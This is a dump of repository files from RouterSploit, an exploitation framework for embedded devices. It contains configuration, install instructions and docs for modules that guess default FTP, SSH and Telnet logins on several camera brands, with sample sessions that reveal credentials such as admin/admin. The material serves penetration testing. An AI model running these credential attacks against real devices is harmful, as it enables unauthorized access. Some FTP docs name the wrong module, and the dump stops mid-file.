[ { "path": ".dockerignore", "content": ".idea/\n.travis/\n\nREADME.md\nLICENSE\n.travis.yml\n*.pyc\n*.log" }, { "path": ".github/ISSUE_TEMPLATE.md", "content": "! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !\n\n## Steps to Reproduce (for bugs)\n1.\n2.\n3.\n4.\n\n## Your Environment\n* RouterSploit Version used:\n* Operating System and version:\n* Python Version: ( `python3 --version` )\n* Python Environment: ( `python3 -m pip freeze` )\n\n## Current Behavior\n* If describing a bug, tell us what happens instead of the expected behavior\n* If suggesting a change/improvement, tell us how it works right now\n\n## Expected Behavior\n* If you're describing a bug, tell us what should happen\n* If you're suggesting a change/improvement, tell us how it should work\n" }, { "path": ".github/PULL_REQUEST_TEMPLATE.md", "content": "## Status\n**READY/IN DEVELOPMENT/HOLD**\n\n## Description\nDescribe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number.\n\n## Verification\nProvide steps to test or reproduce the PR.\n 1. Start `./rsf.py`\n 2. `use exploits/routers/dlink/dsl_2750b_rce`\n 3. `set target 192.168.1.1`\n 4. `run`\n 5. ...\n\n## Checklist\n- [ ] Write module/feature \n- [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))\n- [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))\n" }, { "path": ".gitignore", "content": "# IntelliJ project files\n.idea\nout\ngen\n\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib64/\nparts/\nsdist/\nvar/\n*.egg-info/\n.installed.cfg\n*.egg\n\n# PyInstaller\n# Usually these files are written by a python script from a template\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.coverage\n.coverage.*\n.cache\n.pytest_cache\nnosetests.xml\ncoverage.xml\n*,cover\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# VS Code\n.vscode\n\n# virtualenv\nvenv/\n\n# macOS\n.DS_Store\n.DS_Store?\n\n# vim\n*.swp\n*.swo\n\n# Pipenv files\nPipfile\nPipfile.lock\n\n" }, { "path": ".travis/install.sh", "content": "#!/bin/bash\n\nset -e\nset -x\n\nif [[ \"$(uname -s)\" == 'Darwin' ]]; then\n sw_vers\n\n git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv\n PYENV_ROOT=\"$HOME/.pyenv\"\n PATH=\"$PYENV_ROOT/bin:$PATH\"\n eval \"$(pyenv init -)\"\n\n pyenv install $PYTHON_VERSION\n pyenv global $PYTHON_VERSION\n pyenv rehash\n\n pip install --user virtualenv\n python -m virtualenv ~/.venv\n source ~/.venv/bin/activate\nfi\n\npython -m pip install --upgrade pip\npython -m pip install -r requirements-dev.txt\n" }, { "path": ".travis/run.sh", "content": "#!/bin/bash\n\nset -e\nset -x\n\nif [[ \"$(uname -s)\" == \"Darwin\" ]]; then\n PYENV_ROOT=\"$HOME/.pyenv\"\n PATH=\"$PYENV_ROOT/bin:$PATH\"\n eval \"$(pyenv init -)\"\n source ~/.venv/bin/activate\nfi\n\nmake lint tests\n" }, { "path": ".travis.yml", "content": "language: python\n\nmatrix:\n include:\n - os: linux\n python: 3.6\n\n - os: osx\n language: generic\n env: PYTHON_VERSION=3.6.1\n\ninstall:\n - \"./.travis/install.sh\"\n\n\nscript:\n - \"./.travis/run.sh\"\n" }, { "path": "CONTRIBUTING.md", "content": "# Contribution Guidelines\n\nThere are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor.\n\n* Report bugs to the routersploit issue tracker.\n* Make suggestions for changes, updates, or new features to the routersploit issue tracker.\n* Contribute bug fixes, example code, documentation, or tutorials to routersploit.\n* Contribute new features to routersploit.\n\n## Bug reports\n\nWhen submitting bug reports, please consider providing the following information:\n\n* Reproduction steps: step by step description to reproduce the problem.\n* Expected: Describe the behavior you expect.\n* Actual: Describe the behavior you see.\n\n## Testing\nIt is hard to test modules in all possible scenarios. If you would like to help:\n\n1. Check what device you have - identify vendor and version.\n2. Check if routersploit contains exploits for the device you posses.\n3. If exploit does not work but it should, check \"show info\" for more information. References should provide you with links to proof of concept exploits.\n\nExample:\n```\nReferences:\n- https://www.exploit-db.com/exploits/24975/\n```\n\n4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly.\n\n## Development\n* [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit)\n* [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds)\n* [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner)\n" }, { "path": "Dockerfile", "content": "FROM python:3.9-bookworm\n\nWORKDIR /routersploit\n\nRUN useradd rts -U -m && \\\n chown -R rts:rts /routersploit\n\nUSER rts\nCOPY requirements.txt .\nRUN pip install --user --no-cache-dir -r requirements.txt\n\nCOPY routersploit routersploit\nCOPY rsf.py rsf.py\n\n# Not actually needed since present in docker-compose already\nCMD [\"python\", \"rsf.py\"]\n" }, { "path": "LICENSE", "content": "Copyright 2018, The RouterSploit Framework (RSF) by Threat9 \nAll rights reserved. \n\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n * Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThe above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well.\n\nNote that the RouterSploit Framework is provided as is, and is a royalty free open-source application.\n\nFeel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit.\n" }, { "path": "MANIFEST.in", "content": "recursive-include routersploit/resources/ssh_keys *.json *.key\nrecursive-include routersploit/resources/vendors *.dat\nrecursive-include routersploit/resources/wordlists *.txt\n" }, { "path": "Makefile", "content": ".PHONY: build run test lint lint-modules clean prune help\n\nDIRECTORY=.\nEXCLUDED=.git,rsf.py\nRSF_IMAGE=routersploit\nFLAKE8_IGNORED_RULES=E501,F405,F403,W504\n\nbuild:\n\tdocker build -t $(RSF_IMAGE) .\n\nrun:\n\tdocker run -it --rm $(RSF_IMAGE)\n\nlint:\n\tpython3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY)\n\ntests: clean\n\tpython3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py\n\tpython3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/\n\nclean:\n\tfind . -name '*.pyc' -delete\n\tfind . -name '*.pyo' -delete\n\tfind . -name '*~' -delete\n\nprune:\n\tdocker images -q -f dangling=true | xargs docker rmi\n\tdocker ps -q -f status=exited | xargs docker rm\n\nhelp:\n\t@echo \" run\"\n\t@echo \" Run Routersploit in docker container\"\n\t@echo \" lint\"\n\t@echo \" Check style with flake8.\"\n\t@echo \" test\"\n\t@echo \" Run test suite\"\n\t@echo \" clean\"\n\t@echo \" Remove python artifacts.\"\n\t@echo \" prune\"\n\t@echo \" Remove dangling docker images and exited containers.\"\n" }, { "path": "README.md", "content": "# RouterSploit - Exploitation Framework for Embedded Devices\n\n[![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/)\n[![Build Status](https://travis-ci.org/threat9/routersploit.svg?branch=master)](https://travis-ci.org/threat9/routersploit)\n\n# Community\nJoin community on [Embedded Exploitation Discord](https://discord.gg/UCXARN2vBx).\n\n# Description\nThe RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.\n\n[![asciicast](https://asciinema.org/a/180370.png)](https://asciinema.org/a/180370)\n\nIt consists of various modules that aid penetration testing operations:\n\n* exploits - modules that take advantage of identified vulnerabilities\n* creds - modules designed to test credentials against network services\n* scanners - modules that check if a target is vulnerable to any exploit\n* payloads - modules that are responsible for generating payloads for various architectures and injection points\n* generic - modules that perform generic attacks \n\n# Installation\n\n## Requirements\n\nRequired:\n* requests\n* paramiko\n* pysnmp\n* pycrypto\n\nOptional:\n* bluepy - Bluetooth low energy \n\n## Installation on Kali Linux\n\n```\napt-get install python3-pip\ngit clone https://www.github.com/threat9/routersploit\ncd routersploit\npython3 -m pip install -r requirements.txt\npython3 rsf.py\n```\n\nBluetooth Low Energy support:\n```\napt-get install libglib2.0-dev\npython3 -m pip install bluepy\npython3 rsf.py\n```\n\n## Installation on Ubuntu 20.04\n\n```\nsudo apt-get install git python3-pip\ngit clone https://github.com/threat9/routersploit\ncd routersploit\npython3 -m pip install -r requirements.txt\npython3 rsf.py\n```\n\nBluetooth Low Energy support:\n\n```\nsudo apt-get install libglib2.0-dev\npython3 -m pip install bluepy\npython3 rsf.py\n```\n\n## Installation on Ubuntu 18.04 & 17.10\n\n```\nsudo add-apt-repository universe\nsudo apt-get install git python3-pip\ngit clone https://www.github.com/threat9/routersploit\ncd routersploit\npython3 -m pip install setuptools\npython3 -m pip install -r requirements.txt\npython3 rsf.py\n```\n\nBluetooth Low Energy support:\n```\napt-get install libglib2.0-dev\npython3 -m pip install bluepy\npython3 rsf.py\n```\n\n\n## Installation on OSX\n\n```\ngit clone https://www.github.com/threat9/routersploit\ncd routersploit\nsudo python3 -m pip install -r requirements.txt\npython3 rsf.py\n```\n\n## Running on Docker\n\n```\ngit clone https://www.github.com/threat9/routersploit\ncd routersploit\ndocker compose up --build -d\ndocker attach routersploit\n```\n### To run again without rebuild\n\n```\ndocker start routersploit\ndocker attach routersploit\n```\n\n# Update\n\nUpdate RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.\n\n```\ncd routersploit\ngit pull\n```\n\n# Build your own\nTo our surprise, people started to fork \n[routersploit](https://github.com/threat9/routersploit) not because they were \ninterested in the security of embedded devices but simply because they want to \nleverage our interactive shell logic and build their tools using similar \nconcept. All these years they must have said: _\"There must be a better way!\"_ \nand they were completely right, the better way is called \n[_Riposte_](https://github.com/fwkz/riposte).\n\n[_Riposte_](https://github.com/fwkz/riposte) allows you to easily wrap your \napplication inside a tailored interactive shell. Common chores regarding \nbuilding REPLs was factored out and being taken care of so you can \nfocus on specific domain logic of your application.\n# License\n\nThe RouterSploit Framework is under a BSD license.\nPlease see [LICENSE](LICENSE) for more details.\n\n# Acknowledgments\n* [riposte](https://github.com/fwkz/riposte)\n" }, { "path": "docker-compose.yaml", "content": "services:\n routersploit:\n build:\n context: .\n dockerfile: Dockerfile\n container_name: routersploit\n environment:\n - PYTHONUNBUFFERED=1 \n stdin_open: true \n tty: true \n command: [\"python\",\"rsf.py\"]" }, { "path": "docs/modules/creds/cameras/acti/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Acti Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/acti/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/acti/ftp_default_creds\nrsf (Acti Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Acti Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/acti/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Acti Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/acti/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/acti/ssh_default_creds\nrsf (Acti Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Acti Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/acti/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Acti Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/acti/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/acti/telnet_default_creds\nrsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Acti Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/american_dynamics/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against American Dynamics Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/american_dynamics/ftp_default_creds\nrsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (American Dynamics Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/american_dynamics/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against American Dynamics Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/american_dynamics/ssh_default_creds\nrsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (American Dynamics Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/american_dynamics/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against American Dynamics Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/american_dynamics/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/american_dynamics/telnet_default_creds\nrsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (American Dynamics Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/arecont/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Arecont Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/arecont/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/arecont/ftp_default_creds\nrsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Arecont Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/arecont/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Arecont Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/arecont/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/arecont/ssh_default_creds\nrsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Arecont Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/arecont/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Arecont Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/arecont/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/arecont/telnet_default_creds\nrsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Arecont Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/avigilon/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avigilon Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avigilon/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avigilon/ftp_default_creds\nrsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avigilon Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/avigilon/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avigilon Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avigilon/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avigilon/ssh_default_creds\nrsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avigilon Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/avigilon/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avigilon Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avigilon/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avigilon/telnet_default_creds\nrsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avigilon Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/avtech/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avtech Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avtech/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avtech/ftp_default_creds\nrsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avtech Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/avtech/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Avtech Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/avtech/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/avtech/ssh_default_creds\nrsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Avtech Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: 